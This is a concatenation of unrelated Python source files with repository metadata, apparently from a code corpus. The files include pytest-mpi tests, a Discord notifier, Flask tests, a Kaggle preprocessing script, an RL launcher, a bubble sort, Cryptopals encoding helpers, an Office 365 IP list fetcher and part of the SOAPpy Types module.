assert comm.size >= 4
@pytest.mark.mpi(2)
def test_size_fail_pos():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size > 0
def test_no_mpi():
assert True
"""
MPI_SKIP_TEST_CODE = """
import pytest
@pytest.mark.mpi_skip
def test_skip():
assert True
"""
MPI_XFAIL_TEST_CODE = """
import pytest
@pytest.mark.mpi_xfail
def test_xfail():
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size < 2
except ImportError:
assert True
"""
def test_mpi(testdir):
testdir.makepyfile(MPI_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(skipped=4, passed=1)
def test_mpi_with_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
if has_mpi4py:
result.assert_outcomes(**_fix_plural(passed=3, errors=1, skipped=1))
else:
result.assert_outcomes(**_fix_plural(passed=1, errors=4))
def test_mpi_only_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_TEST_CODE)
result = mpi_testdir.runpytest("--only-mpi")
if has_mpi4py:
result.assert_outcomes(**_fix_plural(passed=2, errors=1, skipped=2))
else:
result.assert_outcomes(**_fix_plural(errors=4, skipped=1))
def test_mpi_skip(testdir):
testdir.makepyfile(MPI_SKIP_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(passed=1)
def test_mpi_skip_under_mpi(mpi_testdir):
mpi_testdir.makepyfile(MPI_SKIP_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
result.assert_outcomes(skipped=1)
def test_mpi_xfail(testdir):
testdir.makepyfile(MPI_XFAIL_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(passed=1)
def test_mpi_xfail_under_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_XFAIL_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
if has_mpi4py:
result.assert_outcomes(xfailed=1)
else:
result.assert_outcomes(xpassed=1)
| 21.61157
| 76
| 0.669981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,038
| 0.396941
|
af33d38936d36aba5ecfba4eb2562457febb889c
| 673
|
py
|
Python
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 18
|
2021-05-04T15:26:59.000Z
|
2022-01-04T17:17:23.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 3
|
2020-11-07T14:45:28.000Z
|
2021-05-05T17:04:22.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 2
|
2021-05-04T15:54:31.000Z
|
2021-05-05T00:15:20.000Z
|
import asyncio
import discord
import nest_asyncio
from repalette.constants import DISCORD_BOT_TOKEN
async def __notify_discord(channel_id, message):
client = discord.Client()
async def __send_message():
await client.wait_until_ready()
await client.get_channel(channel_id).send(message)
await client.close()
client.loop.create_task(__send_message())
await client.start(DISCORD_BOT_TOKEN)
def notify_discord(channel_id, message):
nest_asyncio.apply()
loop = asyncio.get_event_loop()
loop.run_until_complete(
__notify_discord(
channel_id=channel_id,
message=message,
)
)
| 21.709677
| 58
| 0.702823
| 0
| 0
| 0
| 0
| 0
| 0
| 328
| 0.48737
| 0
| 0
|
af34c785490cf98dfc2a7f4269f8b57f92aab889
| 4,404
|
py
|
Python
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | 79
|
2020-10-06T08:34:44.000Z
|
2020-12-12T17:28:53.000Z
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from main import app
@pytest.fixture
def test_client():
app.config["TESTING"] = True
return app.test_client()
def test_GET_index(test_client):
response = test_client.get("/")
assert response.status_code == 200
assert b"Registration of equipment and books." in response.data
assert b"Enter one of the following keywords" in response.data
def test_GET_search_with_correct_query(test_client):
response = test_client.get("/search?query=kindle")
assert b"Search results for kindle" in response.data
def test_GET_search_with_incorrect_query(test_client):
response = test_client.get("/search?unexpected_query=kindle", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_with_not_inputted_query(test_client):
response = test_client.get("/search?query=", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_direct_access(test_client):
response = test_client.get("/search", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_registration_direct_access(test_client):
response = test_client.get("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_POST_registration_success(test_client):
test_client.get("/search?query=UNIX")
response = test_client.post("/registration", data={"asin": "4274064069"})
assert "Registration for details of UNIXという考え方―その設計思想と哲学" in response.data.decode("UTF-8")
def test_POST_registration_failure(test_client):
response = test_client.post("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Please try the procedure again from the beginning, sorry for the inconvenience." in response.data
def test_POST_registration_contributors(test_client):
test_client.get("/search?query=DeepLearning")
response = test_client.post("/registration", data={"asin": "4873117585"})
assert "ゼロから作るDeep Learning ―Pythonで学ぶディープラーニングの理論と実装" in response.data.decode("UTF-8")
assert "斎藤 康毅" in response.data.decode("UTF-8")
def test_POST_registration_publication_date_parse_failed(test_client, caplog):
test_client.get("/search?query=UNIX")
with test_client.session_transaction() as _session:
for product in _session["product_list"]:
product.info.publication_date = "unsupported format"
test_client.post("/registration", data={"asin": "4274064069"})
assert ("__init__", logging.ERROR,
"registration: Parse failed. Unknown string format: unsupported format") in caplog.record_tuples
def test_POST_register_airtable_success(test_client):
imd = ImmutableMultiDict(
[
("image_url", "https://m.media-amazon.com/images/I/210tcugW9ML.jpg"),
("title", "テンマクデザイン サーカス TC DX"),
("url", "https://www.amazon.co.jp/dp/B07XB5WX89?tag=bellonieslog-22&linkCode=osi&th=1&psc=1"),
("asin", "B07XB5WX89"),
("manufacturer", "テンマクデザイン"),
("contributors", None),
("publication_date", None),
("product_group", "Sports"),
("registrants_name", "yusuke-sforzando"),
("default_positions", "sforzando-kawasaki"),
("current_positions", "sforzando-kawasaki"),
("note", ""),
("features", "['サーカスTC DX\\u3000サンドカラー', '【サーカスTCと共通 ●設営が簡単に出来るセットアップガイド付。']")
]
)
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data=imd, follow_redirects=True)
assert b"Registration completed!" in response.data
def test_POST_register_airtable_failure(test_client):
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data={}, follow_redirects=True)
assert b"Registration failed." in response.data
| 40.036364
| 110
| 0.719573
| 0
| 0
| 0
| 0
| 96
| 0.020743
| 0
| 0
| 1,896
| 0.40968
|
af35346b37ed36d8f98147a976a6e4de22d8db47
| 849
|
py
|
Python
|
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | 1
|
2019-12-04T08:23:33.000Z
|
2019-12-04T08:23:33.000Z
|
# Append 19 GBDT-derived feature columns (C30..C48) to the preprocessed train/test CSVs.
f1 = open("../train_pre_1")
f2 = open("../test_pre_1")
out1 = open("../train_pre_1b", "w")
out2 = open("../test_pre_1b", "w")
t = open("../train_gbdt_out")
v = open("../test_gbdt_out")
# Names of the new columns that will hold the GBDT outputs
add = []
for i in range(30, 49):
    add.append("C" + str(i))
# Copy each header line, extended with the new column names
line = f1.readline()
print(line[:-1] + "," + ",".join(add), file=out1)
line = f2.readline()
print(line[:-1] + "," + ",".join(add), file=out2)
# Append the per-row GBDT outputs (row counts are hard-coded to the input file sizes)
for i in range(40428967):
line = f1.readline()[:-1]
a = t.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out1)
for i in range(4577464):
line = f2.readline()[:-1]
a = v.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out2)
f1.close()
f2.close()
out1.close()
out2.close()
t.close()
v.close()
| 23.583333
| 50
| 0.537102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.1649
|
af39c62b461abaa60323cf851d4989edf2ec5def
| 851
|
py
|
Python
|
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | 1
|
2020-05-29T01:37:42.000Z
|
2020-05-29T01:37:42.000Z
|
from PPO import *
from TD3 import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--policy_path", required=True, type=str)
parser.add_argument("--stats_path", required=True, type=str)
parser.add_argument("--env", required=True, type=str)
parser.add_argument("--seed", required=True, type=int)
parser.add_argument("--learn_contact", action='store_true')
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
torch.set_num_threads(args.seed)
import gym
env = gym.make(args.env)
env.seed(args.seed)
ppo = RL(env, [256, 256], learn_contact=args.learn_contact)
print(args.learn_contact)
ppo.seed = args.seed
ppo.model_name = args.policy_path
ppo.stats_name = args.stats_path
ppo.save_model(ppo.model_name)
ppo.collect_samples_multithread()
| 31.518519
| 61
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 73
| 0.085781
|
af39df71abbbbebb35d3f9fbf9be1554dbe20b3c
| 797
|
py
|
Python
|
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | 1
|
2021-12-05T12:27:46.000Z
|
2021-12-05T12:27:46.000Z
|
"""
Bubble Sort:
"""
# Best: O(n) time | O(1) space
# Average: O(n^2) time | O(1) space
# Worst: O(n^2) time | O(1) space
def bubbleSort(array):
did_swap = False
while True:
did_swap = False
for idx in range(1, len(array)):
if array[idx] < array[idx-1]:
# swap
array[idx], array[idx-1] = array[idx-1], array[idx]
did_swap = True
if not did_swap:
return array
"""
Traverse the input array, swapping any two numbers that are out of order and keeping track of any swaps that you make.
Once you arrive at the end of the array, check if you have made any swaps;
if not, the array is sorted and you are done; otherwise, repeat the steps laid out in this hint until the array is sorted.
"""
| 26.566667
| 122
| 0.604768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 449
| 0.563363
|
af3d1abf4c4665c9462b07e2b917b4a51a0fdfc4
| 1,715
|
py
|
Python
|
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
# Crypto Challenge Set 1
"""
1. Convert hex to base64
2. Fixed buffer XOR
3.
"""
import base64
def convert_hex_to_base64(hex):
"""
Converts hex string to base64 encoding
:param hex: hex encoded string
:return: base64 encoded string
"""
# Convert hex to byte string
decoded_hex = bytearray.fromhex(hex)
# Convert byte string to base64 encoded string; then convert to string
encoded_base64_str = bytes.decode(base64.b64encode(decoded_hex))
return encoded_base64_str
def xor_fixed_buffers(buf1, buf2):
"""
Creates XOR buffered string from two hex string buffers
:param buf1: hex encoded string
:param buf2: hex encoded string
:return: xor hex encoded string
"""
# Convert hex to bytearray
decoded_hex_buf1 = bytearray.fromhex(buf1)
decoded_hex_buf2 = bytearray.fromhex(buf2)
# XOR by byte
xor_buf = bytearray(len(decoded_hex_buf1))
for i in range(len(xor_buf)):
xor_buf[i] = decoded_hex_buf1[i] ^ decoded_hex_buf2[i]
# Convert back to hex string
xor_buf = bytes(xor_buf).hex()
return xor_buf
if __name__ == '__main__':
# 1. Convert hex to base64
assert convert_hex_to_base64('49276d206b696c6c696e6720796f757'
'220627261696e206c696b6520612070'
'6f69736f6e6f7573206d757368726f6'
'f6d') \
== 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
# 2. Fixed XOR
assert xor_fixed_buffers('1c0111001f010100061a024b53535009181c',
'686974207468652062756c6c277320657965') \
== '746865206b696420646f6e277420706c6179'
| 23.175676
| 77
| 0.661224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 882
| 0.514286
|
af3fd4c2face07438cfa2add7939e20eaaa6ebd0
| 7,748
|
py
|
Python
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | 1
|
2020-11-01T11:03:01.000Z
|
2020-11-01T11:03:01.000Z
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import os
import sys
import json
import uuid
import argparse
import logging
import coloredlogs
import requests
# Defining the default values that can be overridden on the CLI
DEFAULTS = {
'guidfile': 'client-guid',
'outfile': 'last-dump',
'verfile': 'last-version',
'instance': 'Worldwide'
}
def main(options):
    # Let's do stuff. See init() at the bottom for the 'options' logic
logging.info('Starting')
if options.force:
if options.deltafile:
if os.path.isfile(options.deltafile):
os.remove(options.deltafile)
if os.path.isfile(options.verfile):
os.remove(options.verfile)
if os.path.isfile(options.outfile):
os.remove(options.outfile)
# If we are doing a delta, wipe any previous delta file
if options.deltafile is not None:
write_json_file(options.deltafile, {})
# If there is no update we are done, unless forced
(new_version, previous_version) = get_versions(options.version_url,
options.verfile)
if new_version == previous_version:
logging.info('Version matches previous. No update')
sys.exit(0)
# Download and process the latest IPs
ip_struct = get_ip_addresses(options.data_url, options.optional)
    # Calculate the delta if we are asked to do so
if options.deltafile is not None:
generate_delta(ip_struct, options.outfile, options.deltafile)
logging.info(f'Delta File: {options.deltafile}')
# Dump the latest results to disk
write_json_file(options.outfile, ip_struct, True)
commit_processed_version(options.verfile, new_version)
logging.info(f'Output File: {options.outfile}')
logging.info('Complete!')
def write_json_file(filename, data, pretty=False):
# Dump a python data structure to JSON FILE
logging.debug(f'Writing JSON File : {filename}')
with open(filename, 'w') as file_handle:
if pretty:
json.dump(data, file_handle, indent=2)
else:
json.dump(data, file_handle)
def get_versions(url, filename):
    # Here we want to determine whether there is a new version to process or not
previous_version = "42"
logging.debug('Downloading Version Information')
current_version = get_version_info(url)
# If we've run before, read in the version last processed
if os.path.isfile(filename):
previous_version = read_single_state(filename)
if current_version == previous_version:
logging.debug(f'No version change: {current_version}')
else:
logging.debug(f'New version discovered: {current_version}')
return (current_version, previous_version)
def commit_processed_version(filename, version):
# Write out the version we have finished processing
logging.debug(f'Writing last processed version to: {filename}')
write_single_state(filename, version)
def get_version_info(url):
version_info = requests.get(url).json()
if 'latest' in version_info:
return version_info['latest']
return None
def read_single_state(filename):
logging.debug(f'Read state file: {filename}')
with open(filename, 'r') as file_handle:
return file_handle.readline().rstrip()
def write_single_state(filename, value):
logging.debug(f'Write state file: {filename}')
with open(filename, 'w') as file_handle:
print(value, file=file_handle)
def generate_delta(data, filename, deltafile):
logging.debug('Generating Delta')
delta = {'add': [], 'remove': []}
previous = {}
# If there is a previous run, lets load it.
if os.path.isfile(filename):
with open(filename, 'r') as file_handle:
previous = json.load(file_handle)
# Find new additions
for ip in data:
if ip not in previous:
delta['add'].append(ip)
# Find removals
for ip in previous:
if ip not in data:
delta['remove'].append(ip)
# Write out the Delta
write_json_file(deltafile, delta, True)
def init_deltafile(filename):
logging.debug(f'Initializing Delta File : {filename}')
if os.path.isfile(filename):
with open(filename, 'w') as file_handle:
            # Empty object in case there are no changes
print('{}', file=file_handle)
def get_ip_addresses(url, include_optional):
logging.debug(f'Include optional IPs: {include_optional}')
    # We are going to accumulate IPs in a dict to de-duplicate them
ips = {}
records = requests.get(url).json()
for record in records:
if 'ips' in record:
for ip in record['ips']:
if record['required']:
ips[ip] = 42
elif include_optional:
ips[ip] = 42
return ips
def init():
'''
init()
Handle command line args, setup log, etc..
'''
global DEFAULTS
# Configure log
coloredlogs.install(level='DEBUG',
fmt='%(asctime)s %(levelname)s %(message)s')
# Supress requests log
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
# Handle command line args
parser = argparse.ArgumentParser(
description='Get Microsoft Office 365 IP lists.')
    parser.add_argument('-D', '--debug', dest='debug',
                        help='Enable debug output',
                        action='store_true')
    parser.add_argument('-f', '--force', dest='force',
                        help='Download update even if version has not changed',
                        action='store_true')
    parser.add_argument('-o', '--outfile', dest='outfile',
                        help='Full download output',
                        default=DEFAULTS['outfile'])
    parser.add_argument('-v', '--verfile', dest='verfile',
                        help='File to store version information',
                        default=DEFAULTS['verfile'])
    parser.add_argument('-d', '--deltafile', dest='deltafile',
                        help='Generate delta to file',
                        default=None)
    parser.add_argument('-g', '--guidfile', dest='guidfile',
                        help='File to load guid from. Will generate if file not found',
                        default=DEFAULTS['guidfile'])
    parser.add_argument('-i', '--instance', dest='instance',
                        help='Microsoft Office 365 Instance',
                        choices=['Worldwide', 'China', 'Germany',
                                 'USGovDoD', 'USGovGCCHigh'],
                        default=DEFAULTS['instance'])
    parser.add_argument('-p', '--disable_optional_ips', dest='optional',
                        help="Do not include optional IPs",
                        action='store_false')
options = parser.parse_args()
# Enable debug
if not options.debug:
coloredlogs.decrease_verbosity()
    # Read the client guid from file, or generate one and write it to file for
    # subsequent runs. Note that Microsoft asks for a unique UUID per "system"
    # that accesses the API.
if os.path.isfile(options.guidfile):
options.client_guid = read_single_state(options.guidfile)
else:
options.client_guid = uuid.uuid4()
write_single_state(options.guidfile, options.client_guid)
# Build the URLs based on the Instance selection and our guid
base_url = 'https://endpoints.office.com'
options.version_url = f'{base_url}/version/{options.instance}/?clientrequestid={options.client_guid}'
options.data_url = f'{base_url}/endpoints/{options.instance}/?clientrequestid={options.client_guid}'
return options
if __name__ == '__main__':
main(init())
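# Example invocation (a sketch; the flag spellings assume the argparse definitions
# above, and the addresses shown are placeholders, not real Office 365 ranges):
#
#   python o365_ip.py --instance Worldwide --deltafile last-delta
#
# On a version change this writes the de-duplicated IP map to 'last-dump', the new
# version string to 'last-version', and a delta file shaped like:
#   {"add": ["203.0.113.0/24"], "remove": []}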
| 33.834061
| 105
| 0.63126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,706
| 0.349251
|
af406546a6f0ed26414148fc4236cb5e5b9c721d
| 53,251
|
py
|
Python
|
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
src/SOAPpy/Types.py
|
ramoncreager/SOAPpy
|
8f157e9612e0e140980a909b0e3e4a316c7a4e92
|
[
"BSD-3-Clause"
] | null | null | null |
"""
###############################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
###############################################################################
"""
from __future__ import nested_scopes
import UserList
import base64
import cgi
import urllib
import copy
import re
import time
from types import DictType, ListType, TupleType, StringType, UnicodeType, \
NoneType, IntType, LongType, FloatType
# SOAPpy modules
from Errors import Error
from NS import NS
from Utilities import encodeHexString, cleanDate
from Config import Config
ident = '$Id: Types.py 1496 2010-03-04 23:46:17Z pooryorick $'
NaN = float('NaN')
PosInf = float('Inf')
NegInf = -PosInf
###############################################################################
# Utility functions
###############################################################################
def isPrivate(name):
return name[0] == '_'
def isPublic(name):
return name[0] != '_'
###############################################################################
# Types and Wrappers
###############################################################################
class anyType:
_validURIs = (NS.XSD, NS.XSD2, NS.XSD3, NS.ENC)
def __init__(self, data=None, name=None, typed=1, attrs=None):
if self.__class__ == anyType:
raise Error("anyType can't be instantiated directly")
if type(name) in (ListType, TupleType):
self._ns, self._name = name
else:
self._ns = self._validURIs[0]
self._name = name
self._typed = typed
self._attrs = {}
self._cache = None
self._type = self._typeName()
self._data = self._checkValueSpace(data)
if attrs is not None:
self._setAttrs(attrs)
def __str__(self):
if hasattr(self, '_name') and self._name:
return "<%s %s at %d>" % (self.__class__, self._name, id(self))
return "<%s at %d>" % (self.__class__, id(self))
__repr__ = __str__
def _checkValueSpace(self, data):
return data
def _marshalData(self):
return str(self._data)
def _marshalAttrs(self, ns_map, builder):
a = ''
for attr, value in self._attrs.items():
ns, n = builder.genns(ns_map, attr[0])
a += n + ' %s%s="%s"' % \
(ns, attr[1], cgi.escape(str(value), 1))
return a
def _fixAttr(self, attr):
if type(attr) in (StringType, UnicodeType):
attr = (None, attr)
elif type(attr) == ListType:
attr = tuple(attr)
elif type(attr) != TupleType:
raise AttributeError("invalid attribute type")
if len(attr) != 2:
raise AttributeError("invalid attribute length")
if type(attr[0]) not in (NoneType, StringType,
UnicodeType):
raise AttributeError("invalid attribute namespace URI type")
return attr
def _getAttr(self, attr):
attr = self._fixAttr(attr)
try:
return self._attrs[attr]
except Exception:
return None
def _setAttr(self, attr, value):
attr = self._fixAttr(attr)
if isinstance(value, StringType):
value = unicode(value)
self._attrs[attr] = value
def _setAttrs(self, attrs):
if type(attrs) in (ListType, TupleType):
for i in range(0, len(attrs), 2):
self._setAttr(attrs[i], attrs[i + 1])
return
if isinstance(attrs, DictType):
d = attrs
elif isinstance(attrs, anyType):
d = attrs._attrs
else:
raise AttributeError("invalid attribute type")
for attr, value in d.items():
self._setAttr(attr, value)
def _setMustUnderstand(self, val):
self._setAttr((NS.ENV, "mustUnderstand"), val)
def _getMustUnderstand(self):
return self._getAttr((NS.ENV, "mustUnderstand"))
def _setActor(self, val):
self._setAttr((NS.ENV, "actor"), val)
def _getActor(self):
return self._getAttr((NS.ENV, "actor"))
def _typeName(self):
return self.__class__.__name__[:-4]
def _validNamespaceURI(self, URI, strict):
if not hasattr(self, '_typed') or not self._typed:
return None
if URI in self._validURIs:
return URI
if not strict:
return self._ns
raise AttributeError("not a valid namespace for type %s" % self._type)
class voidType(anyType):
pass
class stringType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type:" % self._type)
return data
def _marshalData(self):
return self._data
class untypedType(stringType):
def __init__(self, data=None, name=None, attrs=None):
stringType.__init__(self, data, name, 0, attrs)
class IDType(stringType):
pass
class NCNameType(stringType):
pass
class NameType(stringType):
pass
class ENTITYType(stringType):
pass
class IDREFType(stringType):
pass
class languageType(stringType):
pass
class NMTOKENType(stringType):
pass
class QNameType(stringType):
pass
class tokenType(anyType):
_validURIs = (NS.XSD2, NS.XSD3)
__invalidre = '[\n\t]|^ | $| '
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
if isinstance(self.__invalidre, StringType):
self.__invalidre = re.compile(self.__invalidre)
if self.__invalidre.search(data):
raise ValueError("invalid %s value" % self._type)
return data
class normalizedStringType(anyType):
_validURIs = (NS.XSD3,)
__invalidre = '[\n\r\t]'
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
if isinstance(self.__invalidre, StringType):
self.__invalidre = re.compile(self.__invalidre)
if self.__invalidre.search(data):
raise ValueError("invalid %s value" % self._type)
return data
class CDATAType(normalizedStringType):
_validURIs = (NS.XSD2,)
class booleanType(anyType):
def __int__(self):
return self._data
__nonzero__ = __int__
def _marshalData(self):
return ['false', 'true'][self._data]
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if data in (0, '0', 'false', ''):
return 0
if data in (1, '1', 'true'):
return 1
raise ValueError("invalid %s value" % self._type)
class decimalType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType):
raise Error("invalid %s value" % self._type)
return data
class floatType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType) \
or data < -3.4028234663852886E+38 \
or data > 3.4028234663852886E+38:
raise ValueError("invalid %s value: %s" % (self._type, repr(data)))
return data
def _marshalData(self):
return "%.18g" % self._data # More precision
class doubleType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType, FloatType) \
or data < -1.7976931348623158E+308 \
or data > 1.7976931348623157E+308:
raise ValueError("invalid %s value: %s" % (self._type, repr(data)))
return data
def _marshalData(self):
return "%.18g" % self._data # More precision
class durationType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
try:
# A tuple or a scalar is OK, but make them into a list
if type(data) == TupleType:
data = list(data)
elif type(data) != ListType:
data = [data]
if len(data) > 6:
raise Exception("too many values")
# Now check the types of all the components, and find
# the first nonzero element along the way.
f = -1
for i in range(len(data)):
if data[i] is None:
data[i] = 0
continue
if type(data[i]) not in (IntType, LongType,
FloatType):
raise Exception("element %d a bad type" % i)
if data[i] and f == -1:
f = i
# If they're all 0, just use zero seconds.
if f == -1:
self._cache = 'PT0S'
return (0,) * 6
# Make sure only the last nonzero element has a decimal fraction
# and only the first element is negative.
d = -1
for i in range(f, len(data)):
if data[i]:
if d != -1:
raise Exception(
"all except the last nonzero element must be "
"integers")
if data[i] < 0 and i > f:
raise Exception(
"only the first nonzero element can be negative")
elif data[i] != long(data[i]):
d = i
# Pad the list on the left if necessary.
if len(data) < 6:
n = 6 - len(data)
f += n
d += n
data = [0] * n + data
# Save index of the first nonzero element and the decimal
# element for _marshalData.
self.__firstnonzero = f
self.__decimal = d
except Exception, e:
raise ValueError("invalid %s value - %s" % (self._type, e))
return tuple(data)
def _marshalData(self):
if self._cache is None:
d = self._data
t = 0
if d[self.__firstnonzero] < 0:
s = '-P'
else:
s = 'P'
t = 0
for i in range(self.__firstnonzero, len(d)):
if d[i]:
if i > 2 and not t:
s += 'T'
t = 1
if self.__decimal == i:
s += "%g" % abs(d[i])
else:
s += "%d" % long(abs(d[i]))
s += ['Y', 'M', 'D', 'H', 'M', 'S'][i]
self._cache = s
return self._cache
class timeDurationType(durationType):
